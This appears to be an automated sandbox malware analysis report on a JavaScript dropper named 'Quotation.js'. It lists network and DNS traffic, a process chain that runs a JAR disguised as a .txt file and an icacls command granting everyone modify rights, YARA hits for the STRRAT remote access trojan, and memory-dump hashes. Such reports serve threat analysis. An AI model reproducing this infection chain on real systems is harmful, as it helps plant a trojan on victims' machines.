                                                                                                                      Nov 26, 2024 09:05:21.662988901 CET49927443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.663002014 CET44349927199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.663099051 CET49927443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.663122892 CET44349927199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.663167000 CET49927443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.830302954 CET44349928199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.830425978 CET49928443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.831458092 CET49928443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.831466913 CET44349928199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.831585884 CET44349928199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.831609964 CET49928443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:21.831619978 CET44349928199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:21.831697941 CET49928443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:22.901242971 CET44349931199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:22.901503086 CET49931443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:22.902339935 CET49931443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:22.902350903 CET44349931199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:22.902513027 CET49931443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:22.902549982 CET44349931199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:22.902659893 CET49931443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:25.499463081 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:25.499521017 CET4434994220.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:25.499597073 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:25.500152111 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:25.500174046 CET4434994220.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:26.671493053 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.671516895 CET44349944199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:26.671648026 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.672135115 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.672147036 CET44349944199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:26.843174934 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.843189001 CET44349946199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:26.843849897 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.843966007 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:26.843980074 CET44349946199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:27.132694006 CET4434994220.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:27.132780075 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:27.133743048 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:27.133748055 CET4434994220.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:27.133831978 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:27.133894920 CET4434994220.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:27.133941889 CET49942443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:27.905479908 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:27.905524969 CET44349950199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:27.905589104 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:27.906090975 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:27.906102896 CET44349950199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.050697088 CET44349946199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.051032066 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.054960012 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.054968119 CET44349946199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.055059910 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.055105925 CET44349946199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.055172920 CET49946443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.311599970 CET44349944199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.311733007 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.312854052 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.312881947 CET44349944199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.312952042 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:28.313100100 CET44349944199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:28.313158989 CET49944443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:29.159080982 CET44349950199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:29.159188986 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:29.160213947 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:29.160224915 CET44349950199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:29.160355091 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:29.160376072 CET44349950199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:29.160439014 CET49950443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:32.139949083 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:32.139996052 CET4434996120.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:32.140098095 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:32.140666962 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:32.140680075 CET4434996120.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.046166897 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.046200991 CET44349963199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.046299934 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.046994925 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.047012091 CET44349963199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.311789989 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.311847925 CET44349964199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.312096119 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.312674046 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:33.312691927 CET44349964199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.831783056 CET4434996120.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.831965923 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:33.832873106 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:33.832885027 CET4434996120.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.833015919 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:33.833266020 CET4434996120.233.83.145192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:33.833360910 CET49961443192.168.2.420.233.83.145
                                                                                                                      Nov 26, 2024 09:05:34.155504942 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.155558109 CET44349968199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.155622959 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.156291962 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.156313896 CET44349968199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.346031904 CET44349963199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.346128941 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.347220898 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.347239971 CET44349963199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.347322941 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.347413063 CET44349963199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.347453117 CET49963443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.893701077 CET44349964199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.893906116 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.895087004 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.895097971 CET44349964199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.895211935 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:34.895283937 CET44349964199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:34.895339966 CET49964443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:35.413111925 CET44349968199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:35.413240910 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:35.414326906 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:35.414334059 CET44349968199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:35.414469957 CET49968443192.168.2.4199.232.192.209
                                                                                                                      Nov 26, 2024 09:05:35.414537907 CET44349968199.232.192.209192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:35.414593935 CET49968443192.168.2.4199.232.192.209
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Nov 26, 2024 09:03:31.814219952 CET6535353192.168.2.41.1.1.1
                                                                                                                      Nov 26, 2024 09:03:31.814219952 CET5857753192.168.2.41.1.1.1
                                                                                                                      Nov 26, 2024 09:03:31.955868006 CET53585771.1.1.1192.168.2.4
                                                                                                                      Nov 26, 2024 09:03:32.054071903 CET53653531.1.1.1192.168.2.4
                                                                                                                      Nov 26, 2024 09:04:05.374476910 CET5536353192.168.2.41.1.1.1
                                                                                                                      Nov 26, 2024 09:04:05.514211893 CET53553631.1.1.1192.168.2.4
                                                                                                                      Nov 26, 2024 09:04:35.202697992 CET5261453192.168.2.41.1.1.1
                                                                                                                      Nov 26, 2024 09:04:35.451936960 CET53526141.1.1.1192.168.2.4
                                                                                                                      Nov 26, 2024 09:05:12.124646902 CET6171653192.168.2.41.1.1.1
                                                                                                                      Nov 26, 2024 09:05:12.269531965 CET53617161.1.1.1192.168.2.4
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Nov 26, 2024 09:03:31.814219952 CET192.168.2.41.1.1.10x69c6Standard query (0)repo1.maven.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:03:31.814219952 CET192.168.2.41.1.1.10xda15Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:05.374476910 CET192.168.2.41.1.1.10xd753Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:35.202697992 CET192.168.2.41.1.1.10xcdf4Standard query (0)repo1.maven.orgA (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:05:12.124646902 CET192.168.2.41.1.1.10x2085Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Nov 26, 2024 09:03:31.955868006 CET1.1.1.1192.168.2.40xda15No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:03:32.054071903 CET1.1.1.1192.168.2.40x69c6No error (0)repo1.maven.orgdualstack.sonatype.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:03:32.054071903 CET1.1.1.1192.168.2.40x69c6No error (0)dualstack.sonatype.map.fastly.net199.232.192.209A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:03:32.054071903 CET1.1.1.1192.168.2.40x69c6No error (0)dualstack.sonatype.map.fastly.net199.232.196.209A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:05.514211893 CET1.1.1.1192.168.2.40xd753No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:35.451936960 CET1.1.1.1192.168.2.40xcdf4No error (0)repo1.maven.orgdualstack.sonatype.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:35.451936960 CET1.1.1.1192.168.2.40xcdf4No error (0)dualstack.sonatype.map.fastly.net199.232.192.209A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:04:35.451936960 CET1.1.1.1192.168.2.40xcdf4No error (0)dualstack.sonatype.map.fastly.net199.232.196.209A (IP address)IN (0x0001)false
                                                                                                                      Nov 26, 2024 09:05:12.269531965 CET1.1.1.1192.168.2.40x2085No error (0)github.com20.233.83.145A (IP address)IN (0x0001)false

                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:03:03:27
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation.js"
                                                                                                                      Imagebase:0x7ff6c6f10000
                                                                                                                      File size:170'496 bytes
                                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:1
                                                                                                                      Start time:03:03:29
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\nvbyatbnf.txt"
                                                                                                                      Imagebase:0x140000
                                                                                                                      File size:257'664 bytes
                                                                                                                      MD5 hash:6E0F4F812AE02FBCB744A929E74A04B8
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000001.00000002.2982954889.000000000A595000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      • Rule: JoeSecurity_STRRAT, Description: Yara detected STRRAT, Source: 00000001.00000002.2982954889.000000000A569000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000001.00000002.2982954889.000000000A563000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:moderate
                                                                                                                      Has exited:false

                                                                                                                      Target ID:2
                                                                                                                      Start time:03:03:29
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                                                                                                      Imagebase:0x270000
                                                                                                                      File size:29'696 bytes
                                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:03:03:29
                                                                                                                      Start date:26/11/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:true

                                                                                                                      Reset < >
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d024061512a4bdc32a9a0bdf580497186cac8fa3f120ecc333c9ce52fc929a42
                                                                                                                        • Instruction ID: b0577cd8290458564c6897e77f14b2737cdf51f7d38a22e8cc4c52f029eda111
                                                                                                                        • Opcode Fuzzy Hash: d024061512a4bdc32a9a0bdf580497186cac8fa3f120ecc333c9ce52fc929a42
                                                                                                                        • Instruction Fuzzy Hash: 2FA178B5A446019FDB18CF24C9A4BA9FBB1FF49318F08D199D81A4FB81C774B844CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8a5883e476cf2eaa75aef49dae558ce68d757f8bf359179a11dfaa9c6b794ad1
                                                                                                                        • Instruction ID: 14831d29bcdfba9227cecc9ed513e0ed3dc88e8c6af418de03adc611cfa0d457
                                                                                                                        • Opcode Fuzzy Hash: 8a5883e476cf2eaa75aef49dae558ce68d757f8bf359179a11dfaa9c6b794ad1
                                                                                                                        • Instruction Fuzzy Hash: B2719A716446419FDB18CF24C8A8BAAFBB1FB49318F08D199E81A4FB81C774B855CB91
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ed75e148c468f5adb501353e2aad55fe9f6ba1d7e63b2f06930a3a0182af5efc
                                                                                                                        • Instruction ID: 7c835613d5ea825df7cd5701960aa7e779a969791d87214cdcc4bd1dc849f45e
                                                                                                                        • Opcode Fuzzy Hash: ed75e148c468f5adb501353e2aad55fe9f6ba1d7e63b2f06930a3a0182af5efc
                                                                                                                        • Instruction Fuzzy Hash: 081179B294022A8FCF14DF4CC4A16ADB7B0FB88318B568525EC65A7741D3347920CB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea0000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a88776f8235f6b0c93d982b0301c995d4e8eee1a694dd39eb109f49dc123123
                                                                                                                        • Instruction ID: d7e84bc0fc6b2a0fe69cfd4c8138ca398a1509fd1933978d7e8eb14a0555b331
                                                                                                                        • Opcode Fuzzy Hash: 3a88776f8235f6b0c93d982b0301c995d4e8eee1a694dd39eb109f49dc123123
                                                                                                                        • Instruction Fuzzy Hash: 33F01576C40229DB8B14EF48C4802EDB7B1EB4421CB1AC496EC283B251D332AD62CF81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fdb3da491a6cf878cf013816811daa9b8940a1a1badcc5a4b217b5c4899c0362
                                                                                                                        • Instruction ID: f4e0ad97a2ef327dc615441711cd5c01a0069cd42c049cd4c8da9a35cd541490
                                                                                                                        • Opcode Fuzzy Hash: fdb3da491a6cf878cf013816811daa9b8940a1a1badcc5a4b217b5c4899c0362
                                                                                                                        • Instruction Fuzzy Hash: AEF0DFB5900A06EBDB158F21C0047DAFBB4FB88718F04821AC42C57710C778B4258BC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6edde7d4917b38e7bd5915c9c4ec7d86c75c78c2c8110ed49667211a817e4beb
                                                                                                                        • Instruction ID: 62792dcbf4f4c49b8ac330f8dfa722329e6d93d52ceca5a6702bf15b388d2439
                                                                                                                        • Opcode Fuzzy Hash: 6edde7d4917b38e7bd5915c9c4ec7d86c75c78c2c8110ed49667211a817e4beb
                                                                                                                        • Instruction Fuzzy Hash: A6F09BB6A04A06EBDB25CF61C1147CAFBB4BB88718F15821AC42C67750C779B46ACBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 71659bab748dd7b99836d29083f13491512a2cb0313185376b83c6ef3f3ecf28
                                                                                                                        • Instruction ID: 1f9bb1ad503839646eb59f54382e5cadd25012896524417dfa5960dc358a7649
                                                                                                                        • Opcode Fuzzy Hash: 71659bab748dd7b99836d29083f13491512a2cb0313185376b83c6ef3f3ecf28
                                                                                                                        • Instruction Fuzzy Hash: 02F09BB6A04A06EBDB29CF65C1047DAFBB4BB88728F14421AC42C67750D779B469CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b099e26bd4467bfd9d1535e314b6f3e73312af48bfd66f1356137a738b216386
                                                                                                                        • Instruction ID: c6c755b946d92911eefc43e2dd33648a2a8e50c027c7d54136c8dcf7e89e01d1
                                                                                                                        • Opcode Fuzzy Hash: b099e26bd4467bfd9d1535e314b6f3e73312af48bfd66f1356137a738b216386
                                                                                                                        • Instruction Fuzzy Hash: 1AF0C2B6D00A0AEBDB248F65C1047DAFBB5BB88718F14421AC42C67710D378B465CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8152c0b837792747a501bcd5b9e918df0c3eb0000eae02b858d43aeb7eb2da51
                                                                                                                        • Instruction ID: 52e8f24e0f76ba95b4f41600f1d538d7fa714a235fb7740bc5962eb9857389a3
                                                                                                                        • Opcode Fuzzy Hash: 8152c0b837792747a501bcd5b9e918df0c3eb0000eae02b858d43aeb7eb2da51
                                                                                                                        • Instruction Fuzzy Hash: 6CF0C2B6D00A06ABDB258F65C1047CAFBB4BB84B28F18821AC42C67710C778B469CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 49929165720543a233d5ffab3ef4b87fa2150d1900eb4a07ffdb5e0d22e290b9
                                                                                                                        • Instruction ID: 853d2f580282ffe5942173e0d0d071484fd4e35bdea46a6dc870f546f7a799c3
                                                                                                                        • Opcode Fuzzy Hash: 49929165720543a233d5ffab3ef4b87fa2150d1900eb4a07ffdb5e0d22e290b9
                                                                                                                        • Instruction Fuzzy Hash: 3DF0C2B6D00A06ABDB248F65C1047CAFBB4BB88718F14421AC42C67710D378B465CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1286c9f17d25f33fc0c18c600b40a8ff85795854795e51718b2aa85a7031f90f
                                                                                                                        • Instruction ID: 90caf631f569ea39639a1fdec4dfadf05e84beb8b94eecbea52c541af5b4c748
                                                                                                                        • Opcode Fuzzy Hash: 1286c9f17d25f33fc0c18c600b40a8ff85795854795e51718b2aa85a7031f90f
                                                                                                                        • Instruction Fuzzy Hash: 82F0C2B6D00A06ABDB248F61C1047CAFBB4BB84718F15421AC42C67710C778B465CBC0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.2980971343.0000000002EA2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EA2000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_2ea2000_javaw.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 450f17ccb9ee0dd6fd9387a3f69bfaade7c94ff39ec49aa45a55c34a0d8f83ba
                                                                                                                        • Instruction ID: ea195617e01e80feea6d15b54079f02baadf93bd7ca9dea67b35335f553e3cc5
                                                                                                                        • Opcode Fuzzy Hash: 450f17ccb9ee0dd6fd9387a3f69bfaade7c94ff39ec49aa45a55c34a0d8f83ba
